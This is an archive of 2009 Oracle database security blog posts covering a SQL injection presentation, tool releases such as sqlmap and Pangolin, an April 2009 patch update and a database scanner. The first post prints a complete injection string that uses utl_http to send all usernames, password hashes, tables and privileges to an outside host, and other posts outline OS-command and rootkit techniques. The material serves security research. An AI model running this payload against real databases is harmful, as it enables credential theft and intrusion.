16 Mai 2009 von Alexander Kornbrust.

I just uploaded the presentation “SQL Injection in Oracle Webapps” to our website. This presentation describes the basics of SQL, different exploitation techniques (inband, out-of-band, blind), how to search creditcard numbers in the database (using dbms_xmlgen), …Here is one of the sample SQL Injection strings from the presentation. With this  SQL Injection string we are getting all username/passwords, all table names, all column names and all privileges in one step. The trick is to use sum(length(utl_http())) in the SELECT clause.

http://victim.com/order.jsp?id=17‘ or 1=((select

sum(length(utl_http.request(’http://www.orasploit.com/’||

username||’='||password) from dba_users)))+((select

sum(utl_http.request(’http://www. orasploit.com/’||

owner||’='||table_name) from dba_tables))+((select

sum(length(utl_http.request(’http://www.orasploit.com/’||

owner||’='||table_name||’='||column_name)) from dba_users))

+((select sum(length(utl_http.request(’http://

www.orasploit.com/’||grantee||’='||granted_role) from

dba_role_privs)))+((select

sum(length(utl_http.request(’http://www.orasploit.com/’||

grantee||’='||owner||’='||table_name||’='||privilege||’='||

grantable) from dba_tab_privs)))–

Geschrieben in SQL Injection, Security, Allgemein | Drucken | Keine Kommentare »

1 Mai 2009 von Alexander Kornbrust.

Sumit Siddarth from www.notsosecure.com has released a small perl script to run OS commands via Oracle based Web Apps. Sumit is using the bug in dbms_export_extension. This problem was fixed with CPU July 2006 but all databases without this (or higher CPU or patchset) are affected (Oracle 8.1.7.4, 9.2.0.1 - 9.2.0.7, 10.1.0.2 - 10.1.0.4, 10.2.0.1-10.2.0.2, XE) . More details are available in my updated tutorial.

I tested the script together with him against several of my test database.

The script is easy to use. Under MacOS I had to install p5-libwww-perl to run it.

At the moment the script does not work against Oracle databases without java but I am sure sooner or later this will be changed. In my opinion the most generic way to run OS commands (as user Oracle) is PL/SQL native (Oracle 9i, Oracle 10g/11g).

Geschrieben in Tools, Exploit, SQL Injection | Drucken | Keine Kommentare »

23 Apr 2009 von Alexander Kornbrust.

Yesterday Bernardo Damele released sqlmap 0.7 rc1 for Linux. This new version of SQLMap was published at the Blackhat Europe and allows the execution of OS commands on SQL Server, MySQL and Postgres.

Oracle is not part of it but I am quite sure sooner or later the execution of Oracle commands will be supported as well…

The blackhat presentation “Advanced SQL injection to operating system full control” is also available for download.

Geschrieben in Tools, SQL Injection, software, Security | Drucken | 1 Kommentar »

21 Apr 2009 von Alexander Kornbrust.

Dennis Yurichev has posted a proof of concept code for Oracle TNS listener . This issue was fixed with patches from the April 2009 CPU.

Geschrieben in CPUApril2009, Exploit | Drucken | Keine Kommentare »

20 Apr 2009 von Alexander Kornbrust.

Few hours ago I saw that Paul Wright posted an entry on his blog Oracle Forensics about a whitepaper “Penetration from Application down to OS” from Alexandr Polyakov.

Alexandr explains in the well written document how to steal the Windows hashes using a fake SMB Server with low privileges (CONNECT, RESOURCE) via Oracle Text. On a previous blog entry in February “What is more dangerous? ALTER SESSION or OS Access?”  I showed how to read files via Oracle Text and Alexandr used a really smart approach to exploit this issue.

Well done Alexandr…

Geschrieben in Allgemein | Drucken | Keine Kommentare »

20 Apr 2009 von Alexander Kornbrust.

Zwell has posted an entry on Full Disclosure (FD) about a new version of Pangolin. This new version comes with an enhanced Oracle support

[…]
Sometimes we meet Oracle database when we do web sql injection testing. All we do is to dump some data in the db. But you know what? Actually, we can do more and more operation of it, just like:
1. Fast data dumping even cannot use union select
2. Dump server information like : db name, sid, real internet ip address, user list, user hash and so on.
3. Execute PL/SQL
4. Privilege escalation
5. Crack user password
6. Execute system command
7. Install oracle rootkit
8. and so many others

Maybe you could say it cannot execute multi-sql through a single query. Don’t worry. There is a demo at http://down2.nosec.org/swf/pangolin_oracle.html, you can watch it and learn a lot of things about Oracle sql injection.
[…]

Most of the stuff is not new… (at least not for me)

1. Fast data dumping even cannot use union select
==>usage of utl_http to get additional data.  A faster way getting all results from multiple queries in a single query is described in a blog entry here.

utl_http is often revoked from public for security reasons. The usage of httpuritype is normally more reliable from the security perspective.

2. Dump server information:
==> via sys_context function. That’s standard Oracle functionality. Nothing special.

3. Execute PL/SQL
==> Pangolin is doing this via an exploit in dbms_export_extension. The bug in dbms_export_extension is old but this exploit was new for me…

4.  Privilege escalation
==> I guess they are doing this via the exploit in dbms_export_extension

5.  Crack (Oracle database) user password
==> Matrixay is doing this since several years.

6. Execute OS commands
==> several techniques (create table, dbms_scheduler, extproc, java, oracle text, plsql_native_9, plsql_native_10, set_events) are available to do this. Via PL/SQL this is easy to achieve…

7. Install Oracle rootkit
==> yeah. Simple via plsql

Maybe you could say it cannot execute multi-sql through a single query.
==> Stacked queries are not possible in Oracle. Correct me if I’m wrong. You are using a PL/SQL Injection vulnerability in a SQL function. This is a small but important difference.

BTW. :
The current version of Pangolin is using Openssl to crack Oracle passwords but not adding the Openssl license to pangolin. This is a license violation of the OpenSSL license…

Here is a screen shot of Pangolin 2.0 (taken from the flash movie from the pangolin website):

Geschrieben in Tools, SQL Injection, software | Drucken | Keine Kommentare »

16 Apr 2009 von Alexander Kornbrust.

I just uploaded 3 new Oracle security videos:

• Scan an Oracle database with Repscan 2.5 via GUI
• Scan an Oracle database with Repscan 2.5 via CLI
• Check Oracle passwords with Checkpwd 3.0 (with password plugins)
  

Trial version of Repscan available on the Sentrigo website.

Geschrieben in Tutorial, Sentrigo, software, Security | Drucken | Keine Kommentare »

16 Apr 2009 von Alexander Kornbrust.

The SQL Injection Tool Pangolin is now available in version 2.0.  I already talked about this SQL Injection tool in a previous blog entry.

Pangolin is now available in different versions. The free version does no longer support Oracle, MySQL, DB2, Postgres, Sybase, …  That’s why I can not provide an updated video of Pangolin.

The Standard edition with Oracle support costs 200 USD. For 8000 USD you will get the Enterprise Edition including sourcecode. I guess the new version does no longer contain a backdoor…

Geschrieben in Tools, SQL Injection | Drucken | Keine Kommentare »

15 Apr 2009 von Alexander Kornbrust.

We just finished the latest version of our  Oracle database scanner Repscan 2.5. You can download a trial version of Repscan from our exclusive distributor and partner Sentrigo.

Here some of the Repscan highlights:

• Scan 1 or 100 databases in 1 run
• GUI and/or commandline interface
• Repscan client runs on Windows, Mac OSX and Linux
• Advanced multi-threading password plugin architecture
• Password plugins for Oracle DES, Oracle SHA1, MD4, MD5, SHA1, APEX3
• Checks Database, History, Roles, HTMLDB 1.4-1.6, APEX 2.0-3.2, OID, OVS passwords
• Optimized dictionary files
• Shows the patch level of all your databases in one-click
• Finds security problems such as unsecure code, SQL Injections, hard coded passwords, deprecated functions
• Detects altered data via SHA2 checksums (including modifications of privilege and user tables)
• Complements and integrates with Sentrigo’s Hedgehog family of database activity monitoring software
• …

Link Repscan Trial

Geschrieben in Tools, Oracle Security | Drucken | Keine Kommentare »

14 Apr 2009 von Alexander Kornbrust.

Oracle just released the April 2009 CPU.The database part of this Critical Patch Update (CPU) contains fixes for 16 security vulnerabilities in the Oracle database. 2 of the Oracle database vulnerabilities (Cluster Services, TNS Listener) are remote exploitable without authentication. The highest CVSS base score is 9.0 is a bug in the resource manager (Oracle 9.2 only) and requires create session privileges only.

This time Oracle has fixed 3 of our vulnerabilities (2 times SQL Injection in Oracle Advanced Queuing, Apex). The description from Oracle concerning the APEX problem is not correct. To access the APEX password hashes  there is no need for an APEX development user. A simple database user with create session is sufficient.

12 researchers are mentioned in this oracle advisory (2 from Red-Database Security (Franz Hüll and Alexander Kornbrust). The usual suspects (Esteban, Joxean and David) are part of the reporters again.

The most critical Oracle security bug (CVE-2009-0979) affects the Resource Manager in Oracle 9.2.

The following database components are affected:

• Advanced Queuing
• Application Express
• Cluster Ready Services
• Core RDBMS
• Database Vault
• Listener
• Password Policy
• Resource Manager
• SQLX Functions
• Workspace Manager

Red-Database-Securit released 3 advisories (SQL Injection in dbms_aqin, SQL Injection in dbms_aqadm_sys and unprivileged DB users can see APEX password hashes)

More details from the rest of this CPU, patches, exploits, …will be released within the next days.

Geschrieben in CPUApril2009, Oracle Security | Drucken | 1 Kommentar »